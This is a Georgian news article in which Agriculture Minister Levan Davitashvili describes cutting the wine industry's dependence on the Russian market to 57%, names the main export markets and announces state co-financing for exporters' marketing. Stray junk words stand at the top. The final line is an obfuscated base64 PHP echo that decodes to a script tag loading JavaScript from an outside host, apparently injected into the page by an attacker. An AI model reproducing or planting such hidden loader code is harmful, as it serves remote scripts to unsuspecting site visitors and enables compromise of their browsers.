celsiusi
ავერსი შნაიდერი
გარემოს დაცვისა და სოფლი მეურნეობის მინისტრმა, ლევან დავითაშვილმა ღვინის ბაზრების დივერსიფიკაციასთან დაკავშირებით კომენტარი გააკეთა და აღნიშნა, რომ საქართველოს დამოკიდებულება რუსეთის ბაზარზე 57%-მდე შემცირდა, რაც სამინისტროს თანმიმდევრული პოლიტიკის შედეგია.
 
„ჩვენ, როდესაც რუსეთის ემბარგო განხრციელდა 87%-ით ვიყავით რუსეთის ბაზარზე დამოკიდებული, ეს დამოკიდებულება მიუხედავად იმისა, რომ რუსეთის აღდგენის შემდეგ საკმაოდ მაღალი იყო ყოველ წელს მცირდება და ამჟამად 57%-მდე ჩამოვიდა. ჩვენი მიზანია, დივერსიფიცირების ღონისძიებებით ეს დამოკიდებულება ყოველწლიურად შევამციროთ, რაც ახალ ბაზრებზე უფრო მეტ მარკეტინგულ აქტივობას გულისხმობს, სადაც ქართული ღვინის ცნობადობა შედარებით ნაკლებია.
 
ჩვენი ქვეყნის მთავარ ბაზრებად წარმოდგენილია: უკრაინა, პოლონეთი, ჩინეთი და გერმანია. პირველად მოხდა, რომ აშშ-ს ბაზარზე, რომელიც მარკეტინგული კუთხით პრიორიტეტულ მიმართულებად იქნა შერჩეული, მილიონიან ნიშნულს მიუახლოვდა ქართული ღვინის ექსპორტი. 2012 წლის მონაცემებით, საქართველოდან 23 მლნ ბოთლის ექსპორტი ხორციელდებოდა, რაც 5-ჯერ ნაკლებია 2021 წლის ღვინის ექსპორტის მონაცემებთან შედარებით.
 
ჩვენი მიზანია აქტიურად განვახორციელოთ პროექტი, რომელიც ინდივიდუალური მარკეტინგული ინიციატივების მხარდაჭერას უკავშირდება ჩვენი ექსპორტიორი კომპანიების მხრიდან, რაც სავაჭრო მარკეტინგის თადაფინანსებას გულისხმობს სახელმწიფოს მხრიდან. პროგრამის პრეზენტაცია სექტემბერში გვქონდა და მეღვინეების მხრიდან დიდი დაინტერესება გამოიწვია.
 
ჩვენი ქვეყნის პრიორიტეტულ ბაზრებზე კიდევ უფრო მეტ გააქტიურებას ველოდებით, დივერისიფიცირების გაძლიერების და აღნიშნული პროგრამის ეფექტიანად განხორციელების შემთხვევაში. ვფიქრობ, ახალ ბაზრებზე კიდევ უფრო მეტად წარმატებულები იქნებიან ქართული ღვინის კომპანიები“, - განაცხადა ლევან დავითაშვილმა.
900
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");